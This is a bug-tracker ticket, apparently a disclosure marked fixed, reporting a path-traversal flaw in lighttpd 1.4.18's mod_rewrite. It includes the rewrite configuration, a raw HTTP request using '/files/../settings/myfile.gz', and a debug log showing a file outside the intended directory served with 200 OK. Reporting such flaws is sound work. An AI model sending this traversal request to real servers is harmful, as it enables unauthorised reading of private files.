id summary reporter owner description type status priority milestone component version resolution keywords cc blockedby phpversion appname pending exts sapi probability blocking 130 mod_rewrite vulnerability sparrow@… moo "lighttpd-1.4.18 ------------------------------ lighttpd.conf: {{{ $HTTP[""host""] =~ ""^(www\.)?(.)(.*)\.abc\.de:81$"" { server.document-root = ""/home/abc_de"" url.rewrite-once = ( # files ---------> ""^/files/(.*)$"" => ""/users/%2/%2%3/files/$1"", # site ""^(.*)$"" => ""/users/%2/%2%3/index.php/$1"" ) } }}} ------------------------------ request: telnet test.abc.de 81 {{{ ---------> GET /files/../settings/myfile.gz HTTP/1.1 Host: abc.de:81 User-Agent: Mozilla/5.0 (X11; U; Linux i686; pl; rv:1.8.1.6) Gecko/20070830 Firefox/2.0.0.6 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: pl,en-us;q=0.7,en;q=0.3 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-2,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Connection: keep-alive }}} ------------------------------ log: {{{ (response.c.205) -- splitting Request-URI ****************************************************************************************************** **** Rewrite: ^/files/(.*)$ ****************************************************************************************************** (response.c.206) Request-URI : /files/../settings/myfile.gz (response.c.207) URI-scheme : http (response.c.208) URI-authority: test.abc.de:81 (response.c.209) URI-path : /files/../settings/myfile.gz (response.c.210) URI-query : (response.c.205) -- splitting Request-URI (response.c.206) Request-URI : /users/t/test/files/../settings/myfile.gz (response.c.207) URI-scheme : http (response.c.208) URI-authority: test.abc.de:81 (response.c.209) URI-path : /users/t/test/files/../settings/myfile.gz (response.c.210) URI-query : (response.c.260) -- sanatising URI ****************************************************************************************************** **** Vulnerability **** (response.c.261) URI-path : /users/t/test/settings/myfile.gz ****************************************************************************************************** (mod_access.c.135) -- mod_access_uri_handler called (response.c.375) -- before doc_root (response.c.376) Doc-Root : /home/abc_de (response.c.377) Rel-Path : /users/t/test/settings/myfile.gz (response.c.378) Path : (response.c.426) -- after doc_root (response.c.427) Doc-Root : /home/abc_de (response.c.428) Rel-Path : /users/t/test/settings/myfile.gz (response.c.429) Path : /home/abc_de/users/t/test/settings/myfile.gz (response.c.446) -- logical -> physical (response.c.447) Doc-Root : /home/abc_de (response.c.448) Rel-Path : /users/t/test/settings/myfile.gz (response.c.449) Path : /home/abc_de/users/t/test/settings/myfile.gz (response.c.466) -- handling physical path (response.c.467) Path : /home/abc_de/users/t/test/settings/myfile.gz (response.c.474) -- file found (response.c.475) Path : /home/abc_de/users/t/test/settings/myfile.gz (response.c.613) -- handling subrequest (response.c.614) Path : /home/abc_de/users/t/test/settings/myfile.gz (mod_access.c.135) -- mod_access_uri_handler called (mod_staticfile.c.394) -- handling file as static file (response.c.625) -- subrequest finished (response.c.114) Response-Header: HTTP/1.1 200 OK Content-Type: application/x-gzip Accept-Ranges: bytes ETag: ""210873236"" Last-Modified: Sun, 30 Sep 2007 02:03:03 GMT Content-Length: 6057 Date: Sun, 30 Sep 2007 13:50:39 GMT Server: Apache Server }}} " defect closed critical admin fixed mod_rewrite 1 Others